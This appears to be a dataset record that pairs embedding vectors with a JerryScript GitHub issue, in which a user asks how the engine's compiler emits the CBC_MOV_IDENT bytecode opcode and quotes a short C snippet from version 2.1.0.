-0.009480098262429237, -0.01872679777443409, -0.027486106380820274, -0.0026291655376553535, -0.007077466696500778, 0.005543214734643698, -0.01311836950480938, 0.022474903613328934, 0.003132002195343375, 0.013317444361746311, -0.0005710540572181344, -0.008711256086826324, -0.008718120865523815, -0.019413264468312263, -0.022694572806358337, 0.022749491035938263, 0.00908881239593029, 0.003634838620200753, -0.004554703366011381, -0.01501988060772419, -0.01808151975274086, -0.004074176773428917, -0.0019409832311794162, 0.014649189077317715, -0.018671881407499313, -0.016337895765900612, -0.012898700311779976, 0.006154169794172049, -0.004980312194675207, 0.025564001873135567, 0.03355446830391884, 0.001545407110825181, -0.012720218859612942, -0.0011472566984593868, 0.019976167008280754, 0.007894361391663551, 0.020525339990854263, -0.009830196388065815, 0.01075692567974329, 0.037618350237607956, -0.006476808805018663, 0.008093436248600483, 0.012589789927005768, 0.0008619441650807858, -0.016900798305869102, 0.019358346238732338, 0.01864442229270935, 0.01585736870765686, -0.011814083904027939, -0.002333985175937414, 0.018012873828411102, 0.00894465483725071, -0.023998858407139778, -0.023106452077627182, -0.023889023810625076, 0.017010632902383804, 0.02281813696026802, 0.018205083906650543, 0.004448301158845425, 0.001703294343315065, 0.0016569577855989337, -0.008196406997740269, -0.0014793346635997295, -0.0019203892443329096, 0.006219383794814348, 0.00007604758138768375, 0.0039883689023554325, 0.007338323630392551, 0.004791534040123224, 0.023422226309776306, -0.05266568809747696, 0.006363541819155216, 0.0034340473357588053, -0.01622806116938591, -0.004012395162135363, -0.010276399552822113, 0.003025599755346775, -0.005608428735285997, 0.004410545341670513, -0.015445489436388016, 0.00954874511808157, -0.020086001604795456, 0.018479671329259872, 0.003416885621845722, 0.0031560284551233053, 0.005632455460727215, -0.004822425078600645, 0.00568394036963582, 0.001760785817168653, 0.0012828337494283915, -0.019770227372646332, -0.0007967298734001815, -0.02224150486290455, -0.006734233349561691, 0.014964963309466839, -0.02614063397049904, -0.016063310205936432, -0.0215001218020916, 0.008464128710329533, 0.002196691930294037, -0.0033688328694552183, -0.01872679777443409, -0.009761549532413483, -0.030671309679746628, 0.0035490302834659815, -0.007825714536011219, -0.024534301832318306, -0.02030567079782486, 0.01919359527528286, -0.007152977865189314, -0.005364733282476664, 0.00788749661296606, -0.009329075925052166, -0.020099731162190437, -0.0015025029424577951, -0.027225250378251076, 0.009521286003291607, -0.003198932623490691, -0.0343233123421669, -0.010969730094075203, -0.007805120665580034, -0.013852887786924839, -0.0025759644340723753, 0.002485007746145129, 0.009281023405492306, -0.0025450733955949545, -0.0018191355047747493, -0.028584452345967293, 0.00718730129301548, -0.0025879775639623404, 0.027801882475614548, -0.014580542221665382, -0.00472975242882967, 0.01447070762515068, -0.005968823563307524, -0.018328648060560226, -0.018232543021440506, -0.02207675389945507, -0.010413692332804203, -0.0003648996935226023, -0.008107165805995464, -0.015926016494631767, -0.015871098265051842, 0.02428717538714409, -0.002910616807639599, -0.009528150781989098, 0.021294182166457176, 0.02763712964951992, -0.0003531010588631034, -0.009006436914205551, 0.01874052733182907, 0.012747677974402905, -0.016736045479774475, 0.02088230289518833, -0.009898842312395573, -0.005460838787257671, 0.013441008515655994, 0.01696944423019886, -0.0012570912949740887, -0.024891264736652374, -0.017024362459778786, -0.010722601786255836, -0.00834742933511734, -0.03619049862027168, -0.008841685019433498, 0.0010554417967796326, 0.025824859738349915, -0.009226106107234955, -0.008244459517300129, 0.004386519081890583, 0.014690376818180084, -0.0036622972693294287, -0.008004195988178253, -0.0024163611233234406, 0.008203270845115185, 0.007379511836916208, -0.011182534508407116, -0.011717977933585644, -0.029545506462454796, 0.014813940972089767, -0.004952853545546532, -0.0025553705636411905, -0.010125376284122467, 0.004733184352517128, 0.004757210612297058, -0.0021572201512753963, -0.008821090683341026, 0.01836983673274517, -0.019317159429192543, -0.013509655371308327, 0.00043654959881678224, -0.009390858002007008, 0.034625355154275894, -0.000024160392058547586, -0.019523099064826965, 0.004973447881639004, 0.0026669211219996214, -0.013228204101324081, 0.005694237072020769, 0.0025330602657049894, 0.026209279894828796, -0.006291463039815426, -0.018671881407499313, -0.023504603654146194, -0.035366740077733994, 0.025728752836585045, -0.0027733235619962215, 0.015212091617286205, -0.027211520820856094, 0.003916289657354355, 0.007173571735620499, -0.014196121133863926, 0.012308339588344097, -0.010125376284122467, 0.007811985444277525, -0.012390715070068836, -0.024644136428833008, -0.0037789964117109776, 0.0005075559602119029, 0.012109263800084591, 0.012967347167432308, 0.0029981411062180996, -0.012445632368326187, -0.0031011111568659544, 0.024685325101017952, 0.02355952002108097, -0.009926301427185535, 0.004376221913844347, 0.0004800973110832274, 0.012843783013522625, 0.003830481553450227, -0.0005478858365677297, -0.007983601652085781, 0.01853458769619465, -0.002855699509382248, -0.014964963309466839, -0.008368022739887238, -0.003555895062163472, 0.005090146791189909, 0.013948993757367134, 0.008869143202900887, 0.008141489699482918, -0.004829289857298136, 0.01751861721277237, 0.005780045408755541, -0.02069009095430374, -0.011422798037528992, -0.005409353878349066, -0.012020023539662361, -0.01632416620850563, -0.011882729828357697, -0.022104211151599884, -0.009912571869790554, -0.020099731162190437, -0.004008962772786617, -0.03097335621714592, -0.0014570244820788503, -0.019811414182186127, 0.027005581185221672, -0.00034795256215147674, -0.004764075390994549, -0.02752729505300522, 0.007894361391663551, -0.004489488899707794, 0.022941701114177704, -0.02288678288459778, -0.014072556979954243, -0.02040177583694458, -0.0019049437250941992, 0.013193880207836628, 0.012349527329206467, -0.006929876282811165, 0.02188454195857048, -0.01920732483267784, -0.01621433161199093, -0.014731564559042454, 0.009466368705034256, -0.010077323764562607, -0.010880489833652973, -0.016667399555444717, -0.022694572806358337, 0.014910046011209488, 0.020635174587368965, -0.025083474814891815, 0.0026652051601558924, -0.01080497819930315, -0.037041716277599335, 0.0009052773239091039, -0.008724985644221306, -0.011580685153603554, -0.0061438726261258125, 0.00423892866820097, -0.016282979398965836, 0.00945950485765934, 0.02605825662612915, -0.005951662082225084, 0.004455165937542915, 0.017573535442352295, 0.003257282078266144, 0.003816752228885889, -0.00978900771588087, -0.020470421761274338, -0.0014939220855012536, 0.015143444761633873, -0.015569053590297699, -0.000011389707651687786, -0.009301616810262203, -0.006744530517607927, -0.010640226304531097, 0.017655910924077034, 0.01011164765805006, 0.015472948551177979, -0.008038518950343132, 0.0032710114028304815, -0.010262669995427132, 0.002116032177582383, -0.004805263597518206, -0.019701579585671425, -0.006452782545238733, 0.002485007746145129, -0.010537256486713886, -0.010729466564953327, 0.0002876722428482026, -0.01603585109114647, 0.012274015694856644, 0.0365474596619606, -0.010873625054955482, -0.01382542960345745, -0.0008846833370625973, 0.016118226572871208, 0.005598132032901049, -0.014621729962527752, -0.004585594404488802, -0.015033610165119171, 0.029820092022418976, 0.00945950485765934, 0.01372932456433773, -0.009658579714596272, -0.018809175118803978, -0.019536828622221947, -0.02428717538714409, 0.006895553320646286, -0.003126853611320257, 0.013701865449547768, 0.0028711450286209583, -0.007976737804710865, 0.012349527329206467, 0.004815560299903154, -0.015129715204238892, 0.0016543836100026965, 0.00011380322393961251, 0.015047339722514153, -0.0021314776968210936, -0.007297135889530182, -0.006167898885905743, -0.0009850789792835712, -0.01362635474652052, -0.00547113548964262, -0.00681317737326026, -0.0011412501335144043, -0.00535786896944046, -0.012981075793504715, 0.004074176773428917, -0.008422940038144588, 0.003758402541279793, 0.025577731430530548, -0.006315489299595356, -0.015610241331160069, 0.01376364752650261, 0.011093294247984886, 0.011518903076648712, 0.0009464652976021171, 0.009953759610652924, 0.027582213282585144, 0.013338038697838783, 0.0028831581585109234, 0.0011060687247663736, -0.02225523442029953, -0.00783257931470871, -0.019632933661341667, 0.00449978606775403, 0.010399962775409222, 0.011841542087495327, 0.015692617744207382, 0.0058418274857103825, 0.014237308874726295, 0.004976879805326462, -0.0016869907267391682, -0.018767986446619034, -0.029984844848513603, -0.013283121399581432, 0.018232543021440506, 0.01696944423019886, 0.006614102050662041, -0.004894503857940435, 0.003121705027297139, -0.015143444761633873, -0.006548887584358454, 0.0011369596468284726, -0.010585309006273746, -0.008972113020718098, 0.015514136292040348, -0.0006002289010211825, -0.012225963175296783, 0.02030567079782486, -0.01079811342060566, 0.003950613085180521, 0.015596512705087662, 0.01835610717535019, -0.0038133198395371437, 0.010914812795817852, -0.016543835401535034, -0.0009310197783634067, 0.00899957213550806, 0.004565000534057617, -0.007201030384749174, -0.0038133198395371437, -0.008059113286435604, -0.00968603789806366, -0.0009447491029277444, -0.005580970086157322, -0.0031680415850132704, -0.00600314699113369, -0.003830481553450227, 0.008237594738602638, 0.017285218462347984, 0.0046919966116547585, 0.03522944450378418, 0.01845221221446991, 0.017559805884957314, -0.014127474278211594, 0.02104705385863781, -0.0022704869043082, -0.005230872426182032, -0.01317328680306673, -0.026840828359127045, -0.013743053190410137, 0.0016543836100026965, -0.01826000213623047, -0.012342662550508976, -0.004314440302550793, 0.010681414045393467, -0.009219241328537464, 0.03989741578698158, -0.02984755113720894, 0.00486704520881176, 0.0033808459993451834, 0.018987655639648438, 0.011017782613635063, -0.023998858407139778, 0.018877821043133736, -0.010729466564953327, 0.007331459317356348, -0.0036588648799806833, 0.025289414450526237, -0.03152252733707428, 0.006020308472216129, -0.0005405921256169677, 0.025797400623559952, -0.0026120038237422705, 0.01090108323842287, 0.05390132591128349, -0.02122553437948227, -0.01808151975274086, -0.004194308537989855, -0.0008473567431792617, 0.019825143739581108, 0.005742290057241917, 0.01937207579612732, 0.004256090614944696, -0.014608001336455345, 0.02623673900961876, 0.0061335754580795765, -0.004963150713592768, 0.0018242839723825455, 0.019866332411766052, -0.0021675170864909887, -0.023147640749812126, 0.02030567079782486, 0.012328932993113995, -0.025165852159261703, -0.0049288272857666016, -0.014992422424256802, 0.011594414710998535, -0.022378798574209213, 0.007942413911223412, -0.005172522738575935, -0.008553368970751762, -0.0003464509209152311, -0.028584452345967293, -0.0006740239914506674, 0.007901226170361042, 0.011381609365344048, 0.015994662418961525, 0.0028488347306847572, -0.013736189343035221, -0.009274158626794815, 0.02446565590798855, 0.001880917465314269, -0.003394575323909521, -0.011093294247984886, -0.006844067946076393, -0.010564714670181274, 0.0054985941387712955, -0.0010073891608044505, 0.015308196656405926, 0.017024362459778786, -0.003538733348250389, -0.023435955867171288, -0.0341036431491375, 0.014704106375575066, 0.015184632502496243, 0.007688421756029129, -0.014347143471240997, -0.00060838065110147, -0.006572913844138384, 0.010173428803682327, 0.014827670529484749, -0.03418601676821709, 0.009576203301548958, 0.008711256086826324, 0.0017341852653771639, -0.025564001873135567, -0.012219098396599293, -0.0056976694613695145, 0.026772182434797287, 0.00894465483725071, -0.03146761283278465, -0.005526052787899971, 0.0033310772851109505, -0.0007383802440017462, 0.0057766130194067955, 0.011230587027966976, 0.019124949350953102, -0.01975649781525135, 0.0030719363130629063, -0.002606855472549796, -0.014580542221665382, -0.019907519221305847, 0.013502790592610836, -0.007908090949058533, -0.003964342176914215, -0.0031422991305589676, 0.008972113020718098, 0.00026128621539101005, 0.004609620664268732, 0.027431190013885498, 0.0036279738415032625, 0.01574753411114216, -0.022049294784665108, -0.00223787990398705, 0.007255947683006525, 0.006315489299595356, 0.0010768938809633255, -0.016639940440654755, -0.02883158065378666, 0.00507985008880496, -0.0015754399355500937, 0.006610669661313295, 0.007681556977331638, 0.016543835401535034, -0.0007409544778056443, -0.03207170218229294, -0.008141489699482918, 0.0047812373377382755, 0.0013609192101284862, -0.00904075987637043, -0.013152692466974258, -0.01835610717535019, 0.009301616810262203, -0.009583068080246449, 0.008580828085541725, -0.019962437450885773, 0.007111790124326944, 0.023490874096751213, -0.016941986978054047, -0.006744530517607927, -0.013571437448263168, -0.003279592376202345, -0.0006264004041440785, -0.014759023673832417, 0.00005990490171825513, 0.01191705372184515, -0.025001099333167076, -0.012356392107903957, 0.00011037089279852808, -0.024081233888864517, -0.005611861124634743, -0.020662633702158928, 0.014024504460394382, -0.008876007981598377, 0.006219383794814348, 0.0010657388484105468, 0.012534872628748417, 0.02114315889775753, 0.0007328026695176959, -0.00028831581585109234, 0.0019753065425902605, -0.003933451604098082, 0.027856798842549324, -0.019893791526556015, 0.00356962438672781, 0.02810392715036869, -0.02104705385863781, 0.00285055092535913, -0.0021520715672522783, 0.004039853811264038, 0.026758452877402306, -0.007406970486044884, 0.025920964777469635, 0.0040673124603927135, -0.003964342176914215, 0.002807646756991744, 0.0062777334824204445, 0.017848121002316475, 0.0033551035448908806, 0.009521286003291607, 0.010365639813244343, 0.013372361660003662, 0.004005530383437872, 0.01145025622099638, 0.014717835932970047, 0.001705868518911302, 0.009850789792835712, -0.005296086892485619, 0.004932259675115347, 0.0290237907320261, 0.014759023673832417, -0.019454453140497208, 0.008663203567266464, 0.008573963306844234, -0.018424753099679947, -0.0023820376954972744, -0.03448806330561638, -0.015321926213800907, 0.010475474409759045, -0.008457263931632042, 0.020745009183883667, 0.0050626881420612335, 0.021088242530822754, -0.0027184062637388706, -0.006761691998690367, -0.005018068011850119, 0.001140392036177218, -0.007750203367322683, -0.016845880076289177, -0.007008819840848446, -0.02690947614610195, -0.009768414311110973, -0.0007778520230203867, -0.02446565590798855, -0.004616485442966223, -0.013427278958261013, -0.0008439244120381773, -0.008724985644221306, 0.011669925414025784, 0.016571294516324997, 0.008690662682056427, 0.005635887384414673, 0.004520379938185215, 0.01985260285437107, 0.0020731280092149973, -0.02290051244199276, 0.025824859738349915, -0.002800782211124897, 0.03058893419802189, 0.009569338522851467, -0.008217000402510166, -0.005354436580091715, 0.0029449400026351213, -0.00950069259852171, -0.005824666004627943, 0.005179387517273426, -0.015239549800753593, 0.018218813464045525, -0.010125376284122467, 0.0069916583597660065, -0.006432188209146261, -0.008265052922070026, -0.012816323898732662, 0.004331601783633232, 0.012301474809646606, 0.008539639413356781, 0.0035129908937960863, -0.002994708949699998, -0.005618725903332233, -0.008793632499873638, 0.007146113086491823, 0.022873053327202797, 0.0047606430016458035, 0.03201678395271301, 0.0006152453133836389, 0.0037000528536736965, 0.0029123330023139715, 0.000982504803687334, -0.014141203835606575, 0.025920964777469635, -0.007324594538658857, 0.02567383646965027, -0.013619489967823029, -0.01089421845972538, 0.004307575523853302, 0.006439052987843752, -0.023051535710692406, -0.028049008920788765, 0.023037806153297424, -0.014690376818180084, -0.0003513848932925612, -0.00025141824153251946, 0.0010914813028648496, -0.0016732614021748304, -0.011669925414025784, -0.010049865581095219, 0.010530391708016396, -0.0028042143676429987, 0.004063880071043968, 0.017202842980623245, 0.008285647258162498, 0.024836348369717598, 0.02198064886033535, 0.005045526660978794, -0.005258331075310707, -0.008924060501158237, -0.009143729694187641, -0.016447730362415314, -0.019042572006583214, -0.008093436248600483, 0.010269534774124622, 0.008683797903358936, 0.002486723940819502, 0.007585451472550631, -0.005045526660978794, -0.011697384528815746, 0.010365639813244343, 0.012994805350899696, -0.0002885303401853889, 0.01441579032689333, -0.00043161562643945217, -0.012912429869174957, 0.0017178816488012671, 0.02301034703850746, -0.005189684685319662, -0.016845880076289177, 0.00744129391387105, -0.0038888310082256794, 0.012253422290086746, 0.03003976121544838, 0.02707422710955143, 0.0019529963610693812, 0.01209553424268961, 0.016639940440654755, 0.0002681508776731789, -0.004709158092737198, 0.002476426772773266, 0.022145399823784828, 0.008168947882950306, 0.025165852159261703, 0.007434429135173559, -0.0005281499470584095, -0.004300710745155811, -0.0015145160723477602, -0.00885541457682848, 0.011779760010540485, 0.004767507780343294, -0.028529535979032516, 0.015033610165119171, 0.0007709873607382178, 0.008807361125946045, 0.020635174587368965, -0.00480183120816946, -0.006147305015474558, -0.016447730362415314, 0.024081233888864517, 0.00028423991170711815, -0.015280737541615963, -0.007482481654733419, -0.02706049755215645, 0.016104497015476227, -0.005474567878991365, -0.01985260285437107, 0.020511610433459282, -0.00783257931470871, -0.0008413501782342792, 0.003123421221971512, 0.01577499322593212, 0.004884207155555487, 0.01261038426309824, -0.005903609562665224, -0.006473376415669918, 0.029710257425904274, 0.02810392715036869, -0.024067506194114685, -0.002975831041112542, 0.0015230969293043017, -0.0328405424952507, -0.01883663237094879, 0.013646948151290417, 0.002280784072354436, -0.007908090949058533, -0.012624113820493221, -0.021115699782967567, -0.006682748440653086, -0.006514564156532288, 0.004764075390994549, -0.0012536589056253433, -0.01507479790598154, -0.006109549198299646, -0.014896316453814507, -0.02688201703131199, -0.03253849968314171, -0.005433380138128996, 0.009102541953325272, 0.008416076190769672, -0.033801596611738205, -0.013708730228245258, -0.003341374220326543, -0.006294894963502884, 0.02217285893857479, 0.007406970486044884, -0.001271678600460291, -0.006919579580426216, -0.04354941472411156, 0.005804071668535471, -0.007084331475198269, -0.002002765191718936, 0.005172522738575935, 0.02273576147854328, -0.02096467837691307, 0.001746198395267129, -0.013928399421274662, -0.015212091617286205, 0.0007027697865851223, -0.00890346709638834, 0.015404301695525646, -0.0004762359312735498, -0.005320113152265549, 0.02003108337521553, 0.0058418274857103825, 0.00035181394196115434, -0.009171188808977604, -0.007599181029945612, -0.006765124388039112, 0.006988225970417261, -0.0048395865596830845, -0.015898557379841805, -0.0069230119697749615, -0.01743624173104763, 0.004719455260783434, 0.016488919034600258, -0.006061496678739786, -0.008031655102968216, 0.004599323496222496, 0.00913686491549015, 0.002790485043078661, 0.001056299894116819, 0.0036588648799806833, -0.007564857602119446, -0.0010794681729748845, 0.0023854700848460197, -0.016543835401535034, 0.013132099062204361, -0.014539354480803013, -0.001760785817168653, -0.0013540545478463173, -0.01131296344101429, -0.020511610433459282, -0.00945264007896185, 0.01659875363111496, 0.019234783947467804, -0.024328362196683884, -0.004764075390994549, 0.0007220766274258494, -0.014003911055624485, 0.023339850828051567, 0.009184918366372585, -0.0008580827852711082, 0.006250274833291769, -0.024795159697532654, -0.0014767604880034924, 0.0017384756356477737, 0.0276508592069149, 0.03459789603948593, -0.00359365064650774, 0.001954712439328432, -0.005241169594228268, -0.01992124877870083, 0.012782000936567783, -0.001070887316018343, -0.029929926618933678, 0.011766030453145504, -0.039567913860082626, -0.009706632234156132, 0.018520858138799667, 0.02198064886033535, 0.015816181898117065, 0.0005088431062176824, -0.00039171476964838803, -0.0005937932874076068, -0.015788722783327103, 0.01034504547715187, 0.007798256352543831, -0.0043453313410282135, -0.007406970486044884, -0.00945950485765934, 0.0015780142275616527, 0.005738857667893171, -0.01882290281355381, 0.045196935534477234, -0.0048395865596830845, 0.016530105844140053, 0.020058542490005493, 0.0010451448615640402, -0.0008915479993447661, 0.002862564055249095, -0.010640226304531097, -0.003231539623811841, 0.01685960963368416, 0.007262812461704016, -0.0057766130194067955, -0.009212376549839973, -0.005828097928315401, -0.012246557511389256, 0.003665729658678174, -0.012493684887886047, 0.005364733282476664, -0.0065660495311021805, 0.0009069934603758156, -0.012809459120035172, -0.009274158626794815, 0.021857084706425667, -0.0006886114133521914, 0.00449978606775403, 0.021307911723852158, 0.013029128313064575, -0.008745579980313778, 0.010935407131910324, -0.022117940708994865, 0.030204514041543007, -0.003447776660323143, -0.012727083638310432, -0.0006765982834622264, 0.010029271245002747, 0.01621433161199093, 0.010557849891483784, 0.015569053590297699, 0.004019259475171566, -0.0003531010588631034, 0.013399820774793625, 0.008807361125946045, -0.007063737139105797, -0.007310864981263876, 0.004235496744513512, 0.00024777138605713844, 0.006524861324578524, 0.01677723415195942, 0.014051963575184345, 0.029325837269425392, 0.02040177583694458, 0.0015385424485430121, 0.0011489727767184377, 0.0015462650917470455, -0.007860038429498672, 0.005879583302885294, 0.013029128313064575, -0.01882290281355381, 0.0030633555725216866, -0.014855128712952137, 0.002740716328844428, -0.009816466830670834, -0.012960482388734818, 0.013111504726111889, -0.026360303163528442, -0.004908233415335417, 0.0031714739743620157, -0.0022224343847483397, -0.016722317785024643, 0.02177470736205578, 0.0006645850953646004, 0.005213710945099592, -0.005797207355499268, 0.014127474278211594, -0.005007770843803883, -0.01548667810857296, 0.012040616944432259, -0.005883015226572752, -0.003018735209479928, -0.003047910053282976, -0.015321926213800907, -0.009315346367657185, -0.0002411212626611814, -0.010496068745851517, 0.00006269367440836504, -0.010564714670181274, -0.006603804882615805, 0.009054489433765411, -0.0059859855100512505, 0.020168377086520195, 0.02178843691945076, -0.009933166205883026, -0.019495639950037003, -0.0073589179664850235, 0.008834820240736008, -0.0016741194995120168, -0.0010108215501531959, -0.017971685156226158, 0.005690804682672024, 0.020511610433459282, 0.007750203367322683, 0.0032332558184862137, -0.01872679777443409, 0.005028365179896355, 0.009926301427185535, 0.011045241728425026, 0.015294467099010944, -0.017298948019742966, -0.015816181898117065, 0.023985128849744797, -0.013852887786924839, -0.0055741057731211185, -0.009075083769857883, 0.00008902608533389866, 0.009397722780704498, 0.002479859162122011, 0.0014390047872439027, -0.03061639331281185, 0.00904762465506792, 0.004053582902997732, -0.017202842980623245, -0.010695143602788448, 0.011855271644890308, 0.015871098265051842, 0.014553084038197994, -0.01799914427101612, 0.017106737941503525, 0.0297651756554842, 0.00021537877910304815, 0.004805263597518206, 0.016900798305869102, -0.022323880344629288, 0.011010917834937572, 0.009246699512004852, 0.017079278826713562, 0.011814083904027939, -0.0179030392318964, 0.023779189214110374, 0.00788749661296606, -0.00744129391387105, 0.013228204101324081, 0.04736616834998131, -0.009335940703749657, 0.0029380754567682743, -0.008738715201616287, -0.0036931883078068495, 0.008587691932916641, 0.018383564427495003, -0.0006409878260456026, -0.009356534108519554, 0.01256233174353838, -0.012143587693572044, 0.009370263665914536, 0.005467703565955162, -0.005251466296613216, -0.0073589179664850235, -0.011759166605770588, 0.02067636139690876, -0.01265157200396061, 0.0027218384202569723, -0.011525767855346203, 0.029078708961606026, -0.00969290267676115, 0.017779475077986717, -0.001997616607695818, 0.021170618012547493, -0.001137817744165659, -0.019880061969161034, 0.017120467498898506, -0.01252114400267601, -0.021294182166457176, -0.0013274539960548282, 0.011052105575799942, -0.02217285893857479, 0.01204748172312975, -0.011745437048375607, 0.020662633702158928, -0.020896030589938164, 0.013187016360461712, 0.0227220319211483, 0.009988083504140377, 0.018973926082253456, -0.01631043665111065, 0.015102257020771503, 0.047613296657800674, 0.004973447881639004, -0.020099731162190437, 0.0042801168747246265, 0.02280440740287304, -0.005690804682672024, -0.01320760976523161, -0.021953189745545387, 0.03418601676821709, 0.011820947751402855, -0.005824666004627943, 0.009274158626794815, 0.01993497833609581, -0.00361767690628767, 0.02476770058274269, -0.025934694334864616, 0.0009087096550501883, -0.013578301295638084, -0.006988225970417261, 0.02141774632036686 ]
71
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
I am trying to manually rebuild some bytecode by trying to reverse engineer the source JS. While I can find the opcode CBC_MOV_IDENT in the foreign bytecode, I am not able to generate that cbc myself. Did that code result from a local variable? Or some sort of cache that needs to be turned on on compilation? I know of this code in v2.1.0 ``` if (opcode == CBC_ASSIGN_SET_IDENT && JERRY_LIKELY (first_byte < last_register_index)) { *opcode_pos_p = CBC_MOV_IDENT; } ``` but dont't see how that helps me...
How to generate CBC_MOV_IDENT
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4538/comments
6
2021-01-24T17:02:26
2021-01-26T11:15:02Z
https://github.com/jerryscript-project/jerryscript/issues/4538
792,844,026
4,538
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : How to generate CBC_MOV_IDENT Issue date: --- start body --- I am trying to manually rebuild some bytecode by trying to reverse engineer the source JS. While I can find the opcode CBC_MOV_IDENT in the foreign bytecode, I am not able to generate that cbc myself. Did that code result from a local variable? Or some sort of cache that needs to be turned on on compilation? I know of this code in v2.1.0 ``` if (opcode == CBC_ASSIGN_SET_IDENT && JERRY_LIKELY (first_byte < last_register_index)) { *opcode_pos_p = CBC_MOV_IDENT; } ``` but dont't see how that helps me... --- end body ---
699
[ -0.007005578838288784, -0.025128362700343132, -0.02346789836883545, 0.013568366877734661, -0.010959065519273281, 0.03494882583618164, 0.0384911485016346, 0.04661951959133148, -0.03573952242732048, 0.06692462414503098, -0.008776741102337837, 0.00038027603295631707, 0.0168892964720726, 0.013947902247309685, 0.030346965417265892, 0.011378135532140732, -0.010073484852910042, 0.019372086971998215, 0.003486975561827421, 0.0001577688381075859, 0.016620459035038948, -0.005965811666101217, 0.003050115192309022, 0.032418593764305115, -0.01426418125629425, -0.005914416629821062, -0.0022238364908844233, -0.016525575891137123, -0.028259525075554848, -0.005934183951467276, 0.02731068804860115, 0.01949859783053398, -0.029809292405843735, -0.015521389432251453, 0.02849673479795456, -0.0053727887570858, 0.001733604003675282, 0.028559990227222443, -0.05920742079615593, -0.0146437156945467, 0.018407436087727547, -0.023373015224933624, -0.014596274122595787, 0.024606503546237946, -0.02324650250375271, 0.04835905134677887, -0.003856626572087407, -0.031058594584465027, 0.008436741307377815, 0.010160461999475956, 0.035613011568784714, -0.020621387287974358, -0.008278601802885532, -0.03681487217545509, 0.017948830500245094, -0.009393485262989998, 0.01869208551943302, -0.015292087569832802, -0.0021309293806552887, 0.0009206683025695384, 0.011828833259642124, -0.026867898181080818, -0.0009715694468468428, 0.009290694259107113, -0.007962322793900967, 0.06271811574697495, -0.03314603492617607, 0.018170226365327835, -0.011275344528257847, 0.01845487765967846, -0.02068464457988739, 0.005321393255144358, 0.04842230677604675, 0.03067905828356743, 0.0013392437249422073, 0.0085395323112607, 0.024132084101438522, 0.03953487053513527, 0.024527432397007942, 0.030426036566495895, -0.025808362290263176, -0.0032220918219536543, 0.0032695336267352104, 0.019830690696835518, 0.03230789676308632, -0.015711156651377678, -0.018960922956466675, -0.054526492953300476, 0.011022321879863739, 0.008357671089470387, -0.0026369758415967226, -0.007689532358199358, 0.013173018582165241, 0.017126506194472313, -0.024764642119407654, 0.029777664691209793, 0.019577667117118835, -0.02090603858232498, -0.034411150962114334, 0.010650694370269775, 0.05383067950606346, 0.033019524067640305, -0.0013688948238268495, 0.007400927599519491, 0.013196739368140697, 0.037826962769031525, 0.023799991235136986, -0.031817663460969925, 0.040262311697006226, 0.09247996658086777, -0.004249998368322849, 0.014706971123814583, -0.005613951478153467, 0.01728464476764202, 0.011212089098989964, 0.005562555976212025, 0.001763255218975246, -0.03349394351243973, -0.009567438624799252, -0.053324632346630096, -0.008666043169796467, 0.02185487560927868, -0.013497204519808292, -0.01908743567764759, -0.012413948774337769, 0.014825575985014439, -0.005602091085165739, 0.009994414635002613, 0.015355342999100685, -0.009164182469248772, -0.0469357967376709, -0.05303998291492462, -0.010864182375371456, 0.0022238364908844233, 0.025033479556441307, 0.003963370807468891, 0.025207433849573135, 0.027421385049819946, -0.015750691294670105, -0.004257905296981335, -0.014612087979912758, -0.014959994703531265, 0.03071068599820137, -0.014793948270380497, -0.02109580673277378, -0.023626038804650307, -0.007309997454285622, 0.05598137527704239, -0.012603716924786568, -0.02046324871480465, 0.021364644169807434, -0.011219996027648449, 0.02571347914636135, 0.012271623127162457, 0.003826975356787443, 0.030062314122915268, 0.007460230030119419, -0.0018630807753652334, 0.035233475267887115, 0.006756509188562632, -0.053103238344192505, -0.01706324890255928, -0.005661393515765667, 0.0025994176976382732, -0.007400927599519491, 0.00824697408825159, 0.007831857539713383, 0.04342510178685188, -0.011014414951205254, 0.01444604154676199, 0.001450929674319923, 0.038839057087898254, 0.010358136147260666, -0.009306508116424084, 0.00546371890231967, 0.002662673592567444, 0.02546045556664467, 0.008942787535488605, 0.0029769756365567446, -0.0394083596765995, 0.004641393665224314, 0.0026784874498844147, 0.0055388351902365685, 0.0010773251997306943, 0.006349300034344196, -0.029461385682225227, 0.027231618762016296, -0.03211812674999237, 0.02171255089342594, -0.03072650171816349, 0.044658590108156204, 0.0299358032643795, 0.028559990227222443, -0.00813627615571022, 0.03298789635300636, 0.018391622230410576, -0.04636649414896965, -0.04978230968117714, -0.02307255007326603, 0.033399056643247604, 0.029255803674459457, -0.04238137975335121, -0.0160511564463377, -0.0008361624786630273, -0.005206742323935032, -0.03194417431950569, -0.032260455191135406, -0.0176483653485775, 0.014256274327635765, -0.027263246476650238, 0.01809115707874298, -0.013070227578282356, 0.040831614285707474, -0.04883347079157829, 0.025223247706890106, -0.008753020316362381, 0.0072269742377102375, 0.011219996027648449, -0.02631440944969654, -0.0067446487955749035, 0.018170226365327835, -0.0360557995736599, -0.021222317591309547, -0.0022673248313367367, -0.014121855609118938, -0.03779533505439758, -0.009464647620916367, 0.01802789978682995, -0.015711156651377678, 0.02087441086769104, 0.024179525673389435, 0.010777205228805542, 0.006203020922839642, 0.013283716514706612, -0.0016841854667291045, -0.021981388330459595, 0.002627092180773616, 0.007238834630697966, 0.00913255475461483, 0.0013293599477037787, -0.022534875199198723, 0.03611905872821808, -0.041622310876846313, -0.014888832345604897, 0.010919530875980854, 0.014469762332737446, -0.018834412097930908, 0.01767999306321144, -0.02849673479795456, -0.023546967655420303, 0.02085859701037407, 0.017759064212441444, -0.0005436044884845614, -0.027769291773438454, 0.000002374408722971566, -0.0028129059355705976, 0.0031173245515674353, 0.04339347407221794, 0.0014963948633521795, -0.016905110329389572, -0.019182318821549416, 0.03573952242732048, -0.05443160980939865, -0.0182967372238636, -0.004779765848070383, -0.019830690696835518, -0.011188368313014507, 0.004692789167165756, -0.00000623523601461784, -0.02810138463973999, 0.029587896540760994, -0.053482770919799805, 0.007855578325688839, 0.03653021901845932, -0.02949301339685917, 0.0022001154720783234, -0.026773013174533844, -0.00369255687110126, 0.00824697408825159, -0.028354408219456673, -0.00018643161456566304, 0.041432544589042664, 0.02827533893287182, 0.055127423256635666, -0.012919995002448559, -0.005696974694728851, -0.016604645177721977, -0.006989764980971813, -0.05202788859605789, -0.04737858846783638, -0.00984418299049139, 0.019182318821549416, -0.03270324319601059, 0.040230683982372284, -0.007151857949793339, -0.020811155438423157, -0.0041037192568182945, -0.003255696501582861, 0.029255803674459457, -0.020605573430657387, 